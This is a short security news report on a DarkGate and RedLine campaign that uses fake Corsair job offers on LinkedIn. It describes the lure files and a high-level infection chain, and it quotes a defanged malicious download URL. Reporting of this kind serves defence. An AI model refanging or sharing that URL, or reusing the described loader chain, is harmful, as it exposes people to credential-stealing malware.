HQ/EMEAFind out how we can help your business
The DarkGate malware operators have leveraged fake Corsair job offers to target LinkedIn users.
These malware operators have allegedly created false LinkedIn posts and direct messages to endorse a job opening for a Facebook Ads specialist at Corsair. The primary objective of this operation is to bait job seekers into unwittingly downloading data-stealing malware such as DarkGate and RedLine.
Based on reports, multiple Vietnamese cybercriminal groups are the primary suspects for these campaigns since they have operated the notorious ‘Ducktail’ campaigns identified last year, like these attacks.
These threat actors want to steal valuable Facebook business accounts, which they can use for malicious advertising or sell to other cybercriminals.
The operator of the fake Corsair job offers has primarily targeted three countries.
Studies show that the fake Corsair job offers have spread dramatically in the US, the UK and India. The actors targeted individuals who have backgrounds in social media management since they mostly have potential access to Facebook business accounts.
The attackers delivered their bait through LinkedIn as a fraudulent job offer supposedly from Corsair. In addition, the campaign urges its targets to download malicious files from a URL (“g2[.]by/corsair-JD”), which then redirects to Google Drive or Dropbox.
This download contains a ZIP file that stores a PDF or DOCX document and the TXT files called Job Description of Corsair.docx, Salary and new products.txt, and PDF Salary and Products.pdf.
Further research also uncovered that the metadata of these files has links that distribute the RedLine stealer. The downloaded archive includes a VBS script, possibly embedded in the DOCX file, which copies and renames ‘curl.exe’ to a new location.
It utilises this archive to download ‘autoit3.exe’ and a compiled Autoit3 script—the executable launches the script, which de-obfuscates itself and assembles DarkGate using embedded strings. Subsequently, the malware attempts to remove security products from the compromised system within 30 seconds of installation, indicating an automated process at play.
While LinkedIn introduced features to counter exploits on the platform last year, users must still verify the information provided before communicating with a new account.
Finally, there is a list of indicators of compromise (IoCs) that could assist organisations in defending against the activities of this threat actor. These IoCs include IP addresses, domains, URLs, metadata, and archive file names.
